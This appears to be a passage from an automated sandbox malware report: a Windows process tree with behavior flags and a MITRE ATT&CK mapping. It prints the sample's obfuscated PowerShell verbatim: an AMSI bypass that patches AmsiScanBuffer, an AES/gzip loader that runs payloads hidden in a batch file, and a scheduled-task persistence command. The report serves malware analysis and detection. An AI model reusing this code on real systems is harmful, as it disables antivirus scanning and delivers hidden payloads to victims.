flection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FPyKeenkZsOeDVbXEDg=PHnmMaDyYvVP @([String])([IntPtr]);$TxwTAFwvwmuFepCXuVRMhJ=PHnmMaDyYvVP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hOrceNjTGUj=$SpEHOpUwNwaIe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+[Char](72)+'and'+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32.'+'d'+''+[Char](108)+'l')));$JCLUaaeeOaemMb=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$hOrceNjTGUj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+'d'+'L'+''+'i'+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$kkVlSKAeXMxjxWvSN=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$hOrceNjTGUj,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$ylHPNWu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JCLUaaeeOaemMb,$FPyKeenkZsOeDVbXEDg).Invoke('a'+'m'+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'ll');$TdrOxtfpAsDIbcvOi=$kAtxpwBnnLoCsb.Invoke($Null,@([Object]$ylHPNWu,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+'f'+'fer')));$POWeJBLhay=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kkVlSKAeXMxjxWvSN,$TxwTAFwvwmuFepCXuVRMhJ).Invoke($TdrOxtfpAsDIbcvOi,[uint32]8,4,[ref]$POWeJBLhay);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TdrOxtfpAsDIbcvOi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kkVlSKAeXMxjxWvSN,$TxwTAFwvwmuFepCXuVRMhJ).Invoke($TdrOxtfpAsDIbcvOi,[uint32]8,0x20,[ref]$POWeJBLhay);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'TW'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'n'+''+'y'+''+[Char](97)+''+[Char](45)+''+'s'+'ta'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1408
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1488

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1572

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2920

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3112

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Users\Admin\AppData\Local\Temp\3394df243b24f41c13e7c1e37be4285ff662cd969fa653f377b1f984ee474a0b.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "
    3⤵
    PID:384
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1776
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /ru builtin\Users /sc onlogon /tn $nya-Loli_ /F /RL HIGHEST /tr "cmd.exe /b /c start \"cmd.exe\" \"C:\Windows\$nya-onimai3\$nya-Loli.bat\""
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process 'C:\Windows\$nya-onimai3\$nya-Loli.bat'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1236
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Windows\$nya-onimai3\$nya-Loli.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function LLppO($CPtuP){ $YqYGn=[System.Security.Cryptography.Aes]::Create(); $YqYGn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $YqYGn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $YqYGn.Key=[System.Convert]::FromBase64String('nKDQKPFRDB4UaeLOndYu+4k+Q0wQVZw47HPOfUUgfBg='); $YqYGn.IV=[System.Convert]::FromBase64String('UfEYRi/5OKMR5zSX3oNZ8w=='); $BfudD=$YqYGn.CreateDecryptor(); $SnIMa=$BfudD.TransformFinalBlock($CPtuP, 0, $CPtuP.Length); $BfudD.Dispose(); $YqYGn.Dispose(); $SnIMa;}function OnLZm($CPtuP){ IEX '$rTpAl=New-Object System.IO.M*em*or*yS*tr*ea*m(,$CPtuP);'.Replace('*', ''); IEX '$Zfmrm=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$HkwXH=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($rTpAl, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $HkwXH.CopyTo($Zfmrm); $HkwXH.Dispose(); $rTpAl.Dispose(); $Zfmrm.Dispose(); $Zfmrm.ToArray();}function IgGdL($CPtuP,$sHjZk){ IEX '$GqVau=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$CPtuP);'.Replace('*', ''); IEX '$jCGEA=$GqVau.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jCGEA.*I*n*v*o*k*e*($null, $sHjZk);'.Replace('*', '');}$jvfbU = 'C:\Windows\$nya-onimai3\$nya-Loli.bat';$host.UI.RawUI.WindowTitle = $jvfbU;$LDiXZ=[System.IO.File]::ReadAllText($jvfbU).Split([Environment]::NewLine);foreach ($YMuuu in $LDiXZ) { if ($YMuuu.StartsWith(':: ')) { $qgoDd=$YMuuu.Substring(3); break; }}$cHpKY=[string[]]$qgoDd.Split('\');IEX '$kTXqv=OnLZm (LLppO ([*C*o*n*v*e*rt]::*F*r*o*m*B*a*se6*4*S*t*ri*n*g*($cHpKY[0])));'.Replace('*', '');IEX '$OpwNO=OnLZm (LLppO ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($cHpKY[1])));'.Replace('*', '');IgGdL $kTXqv $null;IgGdL $OpwNO (,[string[]] ('')); "
        6⤵
        
        PID:3576
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:672
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$nya-Loli_1" /F
        7⤵
        
        PID:4380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        7⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3672

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4020

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:8

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4544

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:432

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:956

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2080

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4152

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:1628

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3044

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1368

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4780

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery